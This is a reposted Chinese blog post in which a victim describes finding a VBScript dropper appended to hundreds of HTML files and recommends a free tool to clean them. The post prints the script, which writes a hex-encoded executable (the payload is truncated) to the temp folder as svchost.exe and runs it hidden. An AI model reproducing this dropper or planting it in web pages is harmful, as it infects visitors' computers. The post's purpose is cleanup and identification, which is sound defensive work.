批量查殺該死的VBscript “svchost.exe” 腳本掛馬

本文轉載自查看原文 2019-03-21 16:19 1884 vb掛馬清理

今天寫代碼突然發現HTML文件最后多了一段VBscript代碼；

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C4..........<span style="color: #FF0000;"><strong>此處數萬代碼</strong></span>"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

看這段代碼應該是掛在網頁上的木馬，然后我趕緊把電腦里其他html文件看了一下，果然，但凡html文件都被感染了。

四百多個html文件，****掛馬他祖宗。

開始嘗試手工刪除掛馬腳本，刪了大概有80多個文件，內心十分崩潰。

還剩405個文件，於是開始鍥而不舍的問百度，必應，谷歌。終於。。。找到了一個清這玩意的神器。

良心工具啊，免費不說，清理速度真快，就是需要手工清理，多清幾次就干凈了。直接百度搜 護衛神掛馬清理工具 就可以找到，好用免費速度快。

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕蟲病毒查殺解決辦法 svchost.exe詳細解析，運行過程 win10 svchost.exe (LocalSystemNetworkRestricted)大量讀寫數據解決html文件的DropFileName = "svchost.exe"木馬 DropFileName = "svchost.exe" 問題解決方案 svchost.exe程序下載解決方法或者在360中看到svchost.exe占網速 windows svchost.exe 引起的出現的莫名其妙的窗口失去焦點安全之路 —— 利用SVCHost.exe系統服務實現后門自啟動 svchost.exe (NetworkService -p) 高網絡帶寬占用修復解決。 svchost.exe啟動服務原理(如何查看系統服務究竟啟動了哪個文件)